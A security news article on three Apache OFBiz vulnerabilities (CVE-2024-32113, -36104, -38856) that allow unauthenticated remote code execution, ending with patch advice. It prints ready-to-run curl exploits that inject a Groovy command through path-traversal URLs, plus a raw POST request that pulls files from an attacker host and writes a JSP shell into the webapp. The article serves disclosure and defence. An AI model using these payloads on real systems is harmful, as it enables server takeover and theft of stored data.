Apache OFBiz for Linux & Windows Vulnerability Allows Unauthenticated Remote Code Execution

A series of vulnerabilities affecting Apache OFBiz has come to light, raising significant cybersecurity concerns.

These vulnerabilities, identified as Common Vulnerabilities and Exposures (CVEs), enable unauthenticated remote code execution on both Linux and Windows platforms.

This article delves into the specifics of these vulnerabilities, their implications, and the steps taken to mitigate them.

Apache OFBiz, a popular open-source enterprise resource planning (ERP) system, has been found to have multiple vulnerabilities that attackers could exploit to execute arbitrary code remotely, according to a report by SecList.

These vulnerabilities have been documented under several CVEs, the most notable being CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856.

CVE-2024-32113: Path Traversal Vulnerability

The first in the series, CVE-2024-32113, was disclosed on May 8, 2024. This vulnerability is rooted in a path traversal issue (CWE-22), allowing attackers to manipulate the application’s controller view map state.

By sending unexpected URI patterns, attackers can bypass authentication checks and gain access to administrative functionalities, such as executing SQL queries or code.

Example Exploit Code:

curl 'https://target:8443/webtools/control/forgotPassword/../ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k --path-as-is

Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial

CVE-2024-36104: Enhanced Path Traversal

Following CVE-2024-32113, CVE-2024-36104 was published on June 4, 2024. This vulnerability also involves path traversal but focuses on preventing the use of particular encoded character sequences.

The remediation involved normalizing URLs to strip semicolons and URL-encoded periods.

Example Exploit Code:

curl 'https://target:8443/webtools/control/forgotPassword/;/ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k --path-as-is
curl 'https://target:8443/webtools/control/forgotPassword/%2e%2e/ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k --path-as-is

CVE-2024-38856: Incorrect Authorization

The most recent vulnerability, CVE-2024-38856, was disclosed on August 5, 2024. It pertains to incorrect authorization checks that allow unauthenticated endpoints to execute screen rendering code.

This vulnerability underscores the need for explicit permission checks in screen definitions.

Example Exploit Code:

curl 'https://target:8443/webtools/control/forgotPassword/ProgramExport' \
-d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" \
-vvv -k

The root cause of these vulnerabilities lies in the ability to desynchronize the controller and view the map state.

Despite patches being released, the underlying issue was not fully resolved, allowing attackers to continue exploiting these vulnerabilities.

Exploitation Method

Attackers can leverage these vulnerabilities to perform unauthorized file operations, such as writing password hashes and credit card numbers to accessible files.

Additionally, they can achieve remote code execution by exploiting the desynchronized state of the controller and view map.

Example Exploit Code for Remote Code Execution:

POST /webtools/control/forgotPassword/viewdatafile HTTP/2
Host: target:8443
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
DATAFILE_LOCATION=http://attacker:80/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://attacker:80/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

Remediation and Recommendations

The Apache OFBiz team has been proactive in addressing these vulnerabilities. The most recent patch, v18.12.16, introduces authorization checks for view maps, ensuring access is restricted based on user authentication status.

1. Immediate Update: Users are strongly advised to update to the latest version of Apache OFBiz to mitigate these vulnerabilities.
2. Regular Audits: Conduct security audits and review access controls within OFBiz installations.
3. Network Monitoring: Implement network monitoring solutions to promptly detect and respond to suspicious activities.

The discovery of these vulnerabilities in Apache OFBiz highlights the critical importance of robust security practices in open-source software.

While patches have been released, ongoing vigilance and proactive measures are essential to safeguard systems against potential exploits.

Users must remain informed and take necessary actions to protect their installations from unauthorized access and data breaches.

What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!